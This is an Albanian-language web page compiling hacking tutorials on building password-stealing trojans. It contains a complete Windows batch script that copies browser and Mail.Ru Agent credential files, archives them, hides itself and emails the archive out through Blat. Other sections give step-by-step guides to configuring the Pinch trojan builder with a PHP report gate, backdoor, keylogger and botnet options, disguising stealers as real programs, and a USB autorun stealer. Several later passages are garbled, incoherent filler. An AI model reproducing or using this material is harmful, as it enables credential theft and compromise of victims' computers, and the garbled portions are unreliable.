Krijimi i një virusi që vjedh fjalëkalimet. Ne krijojmë një Trojan për të vjedhur fjalëkalime. Si të krijoni një Trojan

Në këtë artikull do të përshkruaj sa shpejt dhe pa shumë vështirësi mund të shkruani dhe të krijoni një virus që vjedh skedarë me fjalëkalime dhe i dërgon të gjitha në kutinë tuaj postare.
Le të fillojmë me faktin se virusi do të shkruhet në bat"e (CMD, ju mund të merrni komandat bazë), domethënë në një skedar teksti të rregullt dhe do të ekzekutohet duke përdorur përkthyesin standard të integruar të Windows - "linja e komandës ".
Për të shkruar një virus të tillë, duhet të dini vendndodhjen e saktë të ruajtjes së skedarëve që ai do të vjedhë, komponentët e Blat që mund të shkarkohen nga faqja e jashtme http://www.blat.net/ ose nga serveri ynë, si dhe një komponent nga arkivuesi WinRaR Rar.exe (mund të bësh pa të).
Hapni bllokun e shënimeve dhe kopjoni kodin e mëposhtëm atje:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass MailAgent\reg Attrib %systemroot%\wincs +h +s +r Attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" kopje /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" kopje /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat kopje /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite kopje /y key3.db %SystemDrive%\pass\Mozilla\key3.db kopje /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite kopje /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Fjalëkalimi ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -lidh %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ kaloni rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

Nuk do të shkruaj shumë për kodin e vetë boot.
@echo off - fsheh trupin e batinkës (kështu që nuk është e nevojshme, por gjithsesi)
md %systemroot%\wincs - krijon dosjen wincs në dosjen e sistemit Windows, pavarësisht se në çfarë disku është instaluar apo emri i tij.
md %SystemDrive%\pass\ - krijon dosjen e kalimit në diskun ku është instaluar sistemi Windows.
md %SystemDrive%\pass\opera\ - krijon dosjen opera ku wand.dat dhe cookies4.dat nga shfletuesi Opera do të kopjohen në të ardhmen (deri në versionet 11*, Opera ruan fjalëkalimet e saj në skedarin wand.dat)
md %SystemDrive%\pass\Mozilla\- krijon një dosje Mozilla ku skedarët nga shfletuesi Mozilla (cookies.sqlite, key3.db, signons.sqlite) në të cilat ruhen fjalëkalimet do të kopjohen në të ardhmen.
md %SystemDrive%\pass\MailAgent\- krijon një dosje MailAgent në të cilën do të kopjohen skedarët që përmbajnë historikun e korrespondencës dhe çelësat e regjistrit (që ruajnë fjalëkalimet) nga Mail Agent.
md %SystemDrive%\pass\MailAgent\reg- krijon një dosje reg
attrib %systemroot%\wincs +h +s +r- vendos atribute në dosjen wincs, duke e fshehur atë nga pamja.
tipar %SystemDrive%\pass +h +s +r- njësoj si më sipër.
kopje /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- kopjon skedarin blat.exe nga vendi i ngarkimit në dosjen wincs
kopje /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- kopjon skedarin blat.dll nga vendi i ngarkimit në dosjen wincs
kopje /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- kopjon skedarin blat.lib nga vendi i ngarkimit në dosjen wincs
CD /D %APPDATA%\Opera\Opera\ - shkon në dosjen opera ku ndodhen skedarët me fjalëkalime (dhe gjëra të tjera) për operën.
kopjoni /y wand.dat %SystemDrive%\pass\opera\wand.dat- kopjon skedarin wand.dat në dosjen opera
kopjoni /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- kopjon skedarin cookie4.dat në dosjen opera
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- eksporton çelësin e regjistrit magent_logins2, ku është ruajtur fjalëkalimi, në dosjen reg
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- eksporton çelësin e regjistrit magent_logins3, ku është ruajtur fjalëkalimi, në dosjen reg
CD /D %APPDATA% - shkoni te dosja AppData
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- kopjon përmbajtjen e dosjes Mra\Base në dosjen MailAgent
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- kopjon skedarin ver.txt në dosjen MailAgent
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- shkoni te dosja me profilin e shfletuesit Mozilla
kopjoni /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- kopjon skedarin cookies.sqlite në dosjen Mozilla
kopjoni /y key3.db %SystemDrive%\pass\Mozilla\key3.db- kopjon skedarin key3.db në dosjen Mozilla
kopjoni /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- kopjon skedarin signons.sqlite në dosjen Mozilla
kopjoni /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- kopjon komponentin e arkivimit WinRar Rar.exe në dosjen e kalimit
del /s /q %SystemRoot%\Rar.exe- heq komponentin e arkivit nga dosja e Windows
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- arkivoni përmbajtjen e dosjes së kalimit
kopjoni /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar kopjoni arkivin e krijuar në dosjen wincs
cd %systemroot%\wincs - shkoni te dosja wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Fjalëkalimi - përgatit programin Blat për të dërguar arkivin duke specifikuar të dhënat për autorizim dhe duke dërguar letrën. Mos harroni të tregoni të dhënat tuaja nga kutia postare nga ku do të jetë letra me arkivin dërguar.
ren *.rar pass.rar - vetëm në rast se arkivi nuk ka marrë emrin e gabuar gjatë procesit, ne do ta riemërojmë përsëri në pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -lidhni %systemroot%\wincs\pass.rar- tregoni se në cilën adresë postare do të dërgohet letra dhe dërgoni atë.
rmdir /s /q %SystemDrive%\pass- fshini dosjen e kalimit
rmdir /s /q %systemroot%\wincs- fshini dosjen wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- hiqni komponentët Blat nga dosja e Windows.
del /s /q %systemroot%\blat.lib- hiqni komponentët Blat nga dosja e Windows.
attrib +a +s +h +r %systemroot%\wind.exe- ne vendosim atribute mbi veten tonë, duke u fshehur kështu nga pamja.
EXIT - përfundojmë procesin e batinkës dhe dalim.
cls - pastroni daljen e çdo rreshti në interpretues.
Kopjohet, ruhet si wind.bat dhe përpilohet në exe duke përdorur programin e konvertuesit Bat në exe, më pas ne bashkojmë gjithçka, domethënë marrim përbërësit e programit Blat dhe komponentin e arkivimit WinRar (mund ta shkarkoni) dhe i ngjisim në një skedar i ekzekutueshëm, ose me cilin ndonjë program, rruga për ngarkimin e të gjithë skedarëve duhet të jetë %SystemRoot% ose %WindowsDir% ose %windir% .
Si rezultat, ne marrim një virus që nuk do të merret nga antiviruset dhe do të dërgojë një arkiv me skedarë në emailin tuaj Skedarët që mbërrijnë me email mund të deshifrohen duke përdorur rikuperimin me shumë fjalëkalime, megjithëse jo të gjithë. vetëm wand.dat nga opera dhe më pas nëse nuk është përditësuar në versionet 11* të gjithë skedarët e tjerë mund të deshifrohen duke i zëvendësuar me tuajin.
Unë mendoj se mund të përfundojmë këtu, por nëse keni ndonjë pyetje, mos hezitoni të pyesni.
Faleminderit për vëmendjen tuaj, gjithë të mirat!
©SwAp TheHackWorld.in

Njerëz!!!
Tani do t'ju tregoj se si të krijoni virusin tuaj Trojan (pothuajse tuajin)!

Çfarë ju nevojitet:
truri - 1 pc., kompjuter - 1 pc., akses në internet - 1 pc., Pinch (ndërtues) - 1 pc., server (për raporte trojan) - 1 pc., parser (për deshifrimin e raporteve).

Ndoshta kjo është e gjitha...

Tani, si gjithmonë, një histori e shkurtër.

Trojans
..ato njiheshin rreth 33 shekuj më parë

Në shekullin e 12-të para Krishtit. Greqia i shpalli luftë qytetit të Trojës.
Konflikti lindi kur një princ trojan rrëmbeu mbretëreshën Helen të Spartës dhe njoftoi se donte ta bënte gruan e tij. Kjo natyrshëm zemëroi grekët, veçanërisht mbretin e Spartës. Grekët rrethuan Trojën për 10 vjet, por pa sukses, sepse... Troja ishte e fortifikuar mirë.
Në përpjekjen e fundit, ushtria greke bëri sikur po tërhiqej dhe la pas një kalë të madh prej druri. Trojanët e panë kalin dhe, duke menduar se ishte një dhuratë nga grekët, e tërhoqën zvarrë kalin në qytet, duke mos kuptuar se ushtarët më të mirë grekë ishin ulur brenda kalit të zbrazët prej druri.
Nën mbulesën e errësirës, ​​ushtarët dolën, hapën portat e qytetit dhe më vonë, së bashku me ushtrinë e mbetur, vranë të gjithë ushtrinë trojane. Si një kalë prej druri, programi
Kali i Trojës pretendon të bëjë një gjë, por në fakt bën diçka krejtësisht të ndryshme.

Alexey Demchenko - Kul Khatsker rus njihet gjithashtu si "aka coban2k"
Autori i shumë programeve, dhe programi i tij më i mirë (për mendimin tim) është PINCH, trojani më i zakonshëm në internet! Njeh shumë gjuhë programimi në veçanti: C++, Pascal, Delphi, MySQL, PHP, XML dhe shumë të tjera. Në përgjithësi, ju këshilloj të shkoni në faqen e tij personale www.cobans.net, atje do të gjeni disa informacione rreth tij.

Në veçanti, ne po shqyrtojmë programin Pinch (Pinch 2.58)
Pinch 2.58 është një Builder, një përpilues i virusit Trojan... sepse... në ndërtues do të sulmoni disa funksione të Trojanit... për shembull: vidhni fjalëkalime nga ICQ, TheBat, FAT, cookie të shfletuesit (ky është më i popullarizuari).
POR kjo nuk është e tëra që Pinch gjithashtu mund: të krijojë/të modifikojë një parametër të caktuar në Regjistr, të fshijë veten pas përfundimit të punës, të krijojë një "Ekrani blu të vdekjes", ose akoma më mirë, të krijojë një server (konsolë) në kompjuterin e viktimës (BackDoor ), pas së cilës kompjuteri i viktimës është pronë juaj (fjalë për fjalë). Ju mund të kryeni sulme DDOS përmes kompjuterit të tij përmes adresës së tij IP dhe në këtë moment të ruani sovranitetin tuaj anonim.
Vetëm mos mendoni se mund të keni vetëm një kompjuter në dispozicionin tuaj. Mund t'i keni sa të doni, por ky tashmë quhet BotNet...

Epo, kjo është e gjitha, le të fillojmë ...

Shikoni si duket Pinch Builder më poshtë:

Figura 1.1

Shtuar pas 55 sekondash
Tani do të shpjegoj se si funksionon Trojan ...

1. Ju mund të përpiloni Trojanin në mënyrë që raportet të dërgohen në e-mailin që keni specifikuar. Por ata mund t'ju djegin (d.m.th., Trojanin tuaj) sepse... viktima juaj mund të ketë SP2 (Windows XP Service Pack 2)) që do të thotë se FireWall gjithashtu ka... Firewall nuk do të aktivizojë kurrë (pa lejen tuaj) portin 25 (SMTP) që do të thotë se Troy juaj nuk do të jetë në gjendje të dërgojë raportin e viktimës te E-mail. (postues të tillë të njohur si mail.ru, yandex.ru, etj. nuk marrin raporte) Përdorni postuesin http://goolook.ru Por megjithatë, unë nuk rekomandoj përdorimin e SMTP!

2. Ju mund të përpiloni Trojanin në mënyrë që raportet të dërgohen në serverin që specifikoni.
Është më e sigurt sepse në momentin e dërgimit të raportit, Pinch manifestohet si:
Emri i procesit: iexplorer.exe
Protokolli: http
Adresa në distancë: www.YOUR_SERVER.xxx/get.php
Firewall nuk mund të parandalojë procesin "iexplorer.exe" (dhe nëse do të mundej, nuk do të shihni asgjë në monitorin e kompjuterit tuaj (përveç fotografisë së desktopit))
Protokolli: http:// do të thotë porta "80" (PA KOMENTE)

Pra, sot do të shikojmë "2", unë tashmë thashë po (?) se kjo është më mirë.

Le të shohim më shumë gara në Builder >>>

Figura 1.1

1. Klikoni në skedën “HTTP” dhe zgjidhni protokollin “HTTP”.

2. Në fushën URL, shkruani adresën e faqes suaj të internetit (serverit), për shembull: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
Ne do të fokusohemi në këtë më në detaje ...
Në mënyrë që Pinch t'ju dërgojë raporte nëpërmjet http://, ju duhet një server (le ta quajmë thjesht "faqe") dhe kështu ju duhet një sajt CILI DUHET TË PUNOJNË TË DETYRUARA SCRIPTET PHP!!! Më e mira prej tyre është http://jino-net.ru
Vërtetë, thashë që ka edhe http://onepage.ru/ por serveri u shkatërrua.
Le te vazhdojme...
Pra, regjistrohuni në http://jino-net.ru nën çdo domen dhe çdo fjalëkalim J).
A jeni regjistruar?
Unë mendoj se po…
Le te vazhdojme...
Le të themi se jeni regjistruar në domenin http://petia_lox.jino-net.ru
Ne shkojmë në FTP të faqes tuaj. A e dini se çfarë është FTP? Ehhhh... Më duhet t'ju them, sepse e mbaj mend veten...
FTP është përmbajtja e faqes suaj... pra, duke përdorur protokollin FTP (porta 21), ju arrini në rrënjën e faqes tuaj ku gjenden direktori/dosje/skedarë të ndryshëm etj.

Le të shkojmë në Google.ru dhe të shkarkojmë programin "CuteFTP" ... Ndoshta do ta bëj për ju.
Le të shkojmë këtu >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
Më pëlqen më shumë lidhja e katërt.
Shkarkoni CuteFTP 7.1 + Russifier
Le të shkojmë >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
Unë mendoj se më pas do të kuptoni se si ta shkarkoni programin dhe si ta instaloni atë.

Shtohet pas 1 minute
Shkarkuar, instaluar, Rusifikuar... vazhdojmë...

Tani shkoni te FTP e faqes suaj. Shkoni te dosja /docs/, krijoni ndonjë dosje në këtë dosje, për shembull "mail_p", jepini kësaj dosje të drejtat CHMOD 777 (klikoni me të djathtën në dosje në menunë e kontekstit, gjeni parametrin "CHMOD" ose "Properties" në versione të ndryshme të programit CuteFTP, përkthime të ndryshme)
Tani ngarkoni get në këtë dosje (mail_p). Çfarë është një marrje?
"Merr" këtë skript të portës për marrjen e raporteve nga pinch ka shtrirjen ".php"
Mund ta merrni këtu >>>
http://pinch3.ru/other/gate.txt
Krijoni një skedar teksti Notepad në kompjuterin tuaj dhe kopjoni tekstin e portës
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> jepni shtesën në skedarin e tekstit.php (dikur ishte .txt)

Skripti është gati, riemërtojeni "mail" dhe ngarkojeni në FTP të faqes suaj të internetit në dosjen /docs/mail_p/
Dhe jepni të drejtat CHMOD për këtë skedar 777.

Mbani mend këtë vend, tani raportet do të dërgohen në këtë dosje ku ndodhet marrja (/docs/mail_p/).

Kështu që ne shkruajmë në fushën URL (në ndërtues nëse nuk e keni harruar ende)
http://petia_lox.jino-net.ru/mail_p/mail.php (ju keni adresën tuaj)

3. Le të shohim >>>

Figura 1.2

Bëni të gjitha kutitë e kontrollit si unë në Figurën 1.2
Mos kontrolloni kutinë mbi parametrin "Opera", përndryshe raporti nuk do të deshifrohet (lexoni më poshtë).

Ju tashmë mund të përpiloni... por ne do të shikojmë edhe funksione të tjera shtesë (edhe pse ndonjëherë edhe kërkohen)...

Skeda "PWD" ne tashmë e dimë se çfarë është)
Skeda "Run" është për ummmm, le të themi, për të përmirësuar inteligjencën e Pinch, domethënë për të fshirë veten, për të ruajtur .dll-të tuaja në Windows dhe shumë më tepër.
Skeda spiun. Dërgoni një pamje të ekranit të monitorit të viktimës për të ruajtur IE KeyLog, etj.
Skeda "NET" për komandat e tastierës PHP njofton/ Nuk e di pjesën tjetër...
BegDor-i im i dashur nuk e ka përdorur kurrë skedën "BD" nga Pinch'a...
Skeda "etc" për kompresimin e Trojanit, për ndryshimin e ikonës së Trojanit.
Skeda "Kill" për vrasjen e çdo procesi (për shembull Firewall)
Skeda "IE": menaxhoni IE, shtoni një sajt në të preferuarat, ndiqni një lidhje.
Unë nuk e di skedën "Worm" ... diçka të bëjë me DNSsecs.
Skeda "IRC-bot" është në thelb për botrack. Rregullat e BOTNET-it)!!!

Kthehuni te skeda PWD dhe klikoni butonin (poshtë) "COMPILE"

URA!!! TROJANI ESHTE GATI!!!


Hakerimi Si të krijoni një virus trojan. Pinch (për lamerët)

Konflikti lindi kur një princ trojan rrëmbeu mbretëreshën Helen të Spartës dhe njoftoi se donte ta bënte gruan e tij. Kjo natyrshëm zemëroi grekët, veçanërisht mbretin e Spartës. Grekët rrethuan Trojën për 10 vjet, por pa sukses, sepse... Troja ishte e fortifikuar mirë.

Në përpjekjen e fundit, ushtria greke bëri sikur po tërhiqej dhe la pas një kalë të madh prej druri. Trojanët e panë kalin dhe, duke menduar se ishte një dhuratë nga grekët, e tërhoqën zvarrë kalin në qytet, duke mos kuptuar se ushtarët më të mirë grekë ishin ulur brenda kalit të zbrazët prej druri.

Nën mbulesën e errësirës, ​​ushtarët dolën, hapën portat e qytetit dhe më vonë, së bashku me ushtrinë e mbetur, vranë të gjithë ushtrinë trojane.

Shënimet e një administratori të ri

Disa ditë më parë, një nga miqtë e mi la grafite në murin tim të kontaktit me një mesazh se më ka hakuar llogarinë, etj. kishte një lidhje në faqen vk-****.msk.ru. Epo, po. Sigurisht.) Unë i shkrova menjëherë që ta trajtonte dhe t'i ndryshonte fjalëkalimin. Por lidhja akoma më interesonte, megjithëse e dija me siguri që ishte një Trojan (kjo më interesonte). Vendosa të ndjek këtë lidhje. Si rezultat, m'u ofrua të shkarkoja një program që supozohet se përfiton nga një dobësi e kontaktit të zbuluar së fundmi dhe ju lejon të hakoni çdo llogari.

Udhëzime për krijimin e një Trojan për të vjedhur fjalëkalime

Një udhëzues i shkurtër për vjedhjen e parave nga bankat në internet Territori i hakerëve: HackZona 28 dhjetor 2010 Gjithçka rreth krijimit të faqeve të internetit, blogeve, forumeve, dyqaneve në internet, promovimi i tyre nëse është e nevojshme të përdoret një lloj trojan për këtë, nuk e di. . Fjalëkalimet e shtëpisë sime janë super komplekse, kështu që shpresoj se mund të thyhen. me origjinë nga Ukraina (regjistrimi, rishikimet dhe mundësitë e Likpay) Krijimi i një Trojan për të vjedhur fjalëkalime! — YouTube 1 nëntor 2012 nëse nuk e kuptoni, shkruani në Skype: comrad714 emri i programit UFR stealer 3.0.1.0.

Si të krijoni një Trojan

Bëhuni gati, duhet të shkruajmë dy programe njëherësh. Njëra do të jetë në kompjuterin tuaj (klienti), tjetra do të duhet t'i hidhet viktimës (serverit). Do të ketë shumë punë, pra më pak fjalë dhe më afër trupit.

Pra, hapni Delphi ose nëse e keni tashmë në punë, atëherë krijoni një projekt të ri ("File" - "Aplikacion i ri"). Tani do të zbresim në pjesën e serverit të Trojanit.

Këtu duhet të lëvizni "Nga 1" nga seksioni "Krijo automatikisht formularë" (lista në të majtë) në "Format e disponueshme" (lista në të djathtë), siç bëra unë.

Si të krijoni një Trojan

Mendoj se çdo lexues e di origjinën dhe kuptimin e thënies “Kali i Trojës”. Parimi i funksionimit të virusit Trojan është afërsisht i njëjtë (kjo është arsyeja pse ai mori emrin e tij). Ka shumë lloje të këtij virusi, sot do të përqendrohem në një nga opsionet për krijimin e një programi trojan bazuar në zhvillimet e Alexey Demchenko ose, siç quhet edhe ai, "aka coban2k", i cili është autor i një numri të madh i programeve, duke përfshirë PINCH, i cili është bërë trojani më i zakonshëm në World Wide Web!

Si të krijoni një program trojan.

Ne bëmë Trojan dhe tani po bëjmë edhe një Trojan për të vjedhur fjalëkalime!

Këtu do t'ju tregoj se si të bëni një Trojan të thjeshtë për të vjedhur fjalëkalime nga ICQ, Vkontakte, Odnoklassniki, Mail. etj. 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%

Tani hapni skedarin "1.bat" me bllokun e shënimeve. dhe ndryshoni fjalët "Hyrja" në hyrjen tuaj nga posta Yandex. dhe ndryshoni fjalën "Fjalëkalimi" në fjalëkalimin tuaj të postës Yandex.

Ne presim. shkarkimi i përfunduar.

Ne krijojmë një Trojan që vjedh të gjitha fjalëkalimet nga shfletuesit (siç është premtuar)

Pra, së pari duhet të shkarkojmë programin e vjedhësit UFR, kjo mund të bëhet në faqen zyrtare të internetit vazonez.com ose përmes lidhjes >> http://rghost.ru/55883641

Më pas shkojmë te "ndërtimi i opsioneve" dhe klikojmë ikonën e ndryshimit në mënyrë që trojani ynë të duket si një program i vërtetë, ose klikojmë bashkimin e skedarëve (është më mirë që viktima të nisë programin me të cilin trojani ishte ngjitur së bashku, dhe së bashku me programin vetë Trojan)

Krijimi i një Trojan për të vjedhur fjalëkalime

Plani i funksionimit të virusit është si më poshtë: lëshohet, skanon të gjitha dosjet në PC dhe kopjon skedarët e nevojshëm (me maskë, për shembull, *.txt. pass*, etj.) në një flash drive.

Aktivizon një modalitet të zgjeruar të përpunimit të komandave, d.m.th., lejon ndërtime komplekse si dy komanda në një gjendje dhe të tjera. Mos qeshni, sepse për Batch kjo është shumë e lezetshme.

Tjetra, duhet të mbani mend shtegun për në direktorinë nga ku është nisur skedari i grupit (duhet t'i kopjojmë të dhënat në flash drive, dhe jo në ndonjë hard disk) sepse kodi që vjen më pas ngatërron vlerën e ndryshores CD ( dosja aktuale e punës).

Në fund të punës së Trojanit, ai do të krijojë një skedar ready.txt në mënyrë që të dimë se ka mbaruar punën (ne do ta bëjmë Trojanin të padukshëm, pa një tastierë).

Trojan për vjedhjen e fjalëkalimit VKontakte, instaluesi i shkarkimit

Në një kolonë, një Trojan për vjedhjen e një fjalëkalimi në Kontakt bllokon lojën në PS3. Për të vjedhur fjalëkalimin, Trojani merr parasysh koordinatat gjeografike të pronarit për të vjedhur materialin e njohur. Duke marrë parasysh veprimet e përdoruesit, fjalëkalimi Trojan ju lejon të personalizoni ekranin për komunikim në sistem.

Për komunikim, trojanët e fjalëkalimeve dhe negociatat automatike ofrojnë mjete të fundit të krijimit.

Trojan për vjedhjen e fjalëkalimit

Ashtu si puna në zyrë, ai ofron navigim të lehtë në formën e një disku virtual. Active Control njofton lëshimin e një produkti për të punuar me faqeshënuesit. Hapësira lineare përcakton vendndodhjen e tyre të saktë për të parandaluar përvetësimin.

Power Batch po kërkon një temë ndihme për kufizimin e trafikut. Madhësia mjaft e madhe në furrë ju lejon të shfaqni raporte. Duke mbajtur të shtypur tastet për t'u ftohur, Trojan që vjedh fjalëkalimin, si redaktimi individual, përfshin transferimin e plotë të të dhënave.

Trojans #9

Antivirus Stealer - zhbllokoni këtë program, kopjoni 2 skedarë dhe një dosje në një flash drive (Antivirus.bat,autorun.inf,prog) dhe mund të shkoni me miqtë tuaj me flash drive! Futni flash drive-in në kompjuter, klikoni Antivirus.bat, kur të ndalojë, mund ta mbyllni dhe të hiqni flash drive-in, të gjitha fjalëkalimet që keni në kompjuterin tuaj në flash drive, ato do të ruhen në "prog" —> dosja “log”.

Këtu do t'ju tregoj se si të bëni një Trojan të thjeshtë për të vjedhur fjalëkalime nga ICQ, Vkontakte, Odnoklassniki, Mail... etj., etj.
Le të fillojmë... së pari na duhen disa programe:
Multi Password Recovery është një mjet për rikuperimin e fjalëkalimeve të harruara
blat është një klient email.
Konvertuesi Bat to Exe - konvertuesi i formatit bat-exe.
Ju mund t'i shkarkoni të gjitha këto në një arkiv:

Duhet të jeni të regjistruar për të parë lidhjet.


Shkarkoni dhe shpaketoni në një dosje të veçantë...
Tani hapni skedarin "1.bat" me notepad... dhe ndryshoni fjalët "Identifikohu" në hyrjen tuaj nga posta Yandex... dhe ndryshoni fjalën "Fjalëkalimi" në fjalëkalimin tuaj nga posta Yandex...



Ruaj dhe mbyll...
Tani hapni "Bat_To_Exe_Converter"...
Në fushën "Batch file", tregoni skedarin që keni ruajtur "1.bat"
Fusha "Ruaj si" nuk mund të ndryshohet...
Vendosni cilësimet siç tregohet më poshtë:



Tani le të shkojmë te skeda "Përfshi"...
Dhe transferoni atje të gjithë skedarët nga dosjet "blat" dhe "MPR...".



Duhet të jenë saktësisht shtatë të tilla, siç tregohet më lart!!!
Epo, tani le të shtojmë një ikonë në Trojan tonë ... kjo nuk është e nevojshme, por duket më shumë si një lloj programi ...
Shkoni te skeda "Versioninformacionet" dhe në fushën "Icon fie" zgjidhni ikonën....
Klikoni "Përpiloni"...
Ne presim... që shkarkimi të përfundojë... dhe kontrolloni dosjen me skedarin "1.bat"... Trojani juaj "1.exe" duhet të ishte shfaqur atje (Mund ta quani si të doni

)...
Epo, tani le të kontrollojmë... lëshojmë Trojanin në kompjuterin tonë dhe presim... pas 30 sekondash... një skedar do të dërgohet në emailin tuaj... shkarkojeni (fjalëkalimet ruhen në të)
E shkarkuar... tani e lançojmë përmes "MPR" dhe admirojmë fjalëkalimet




Top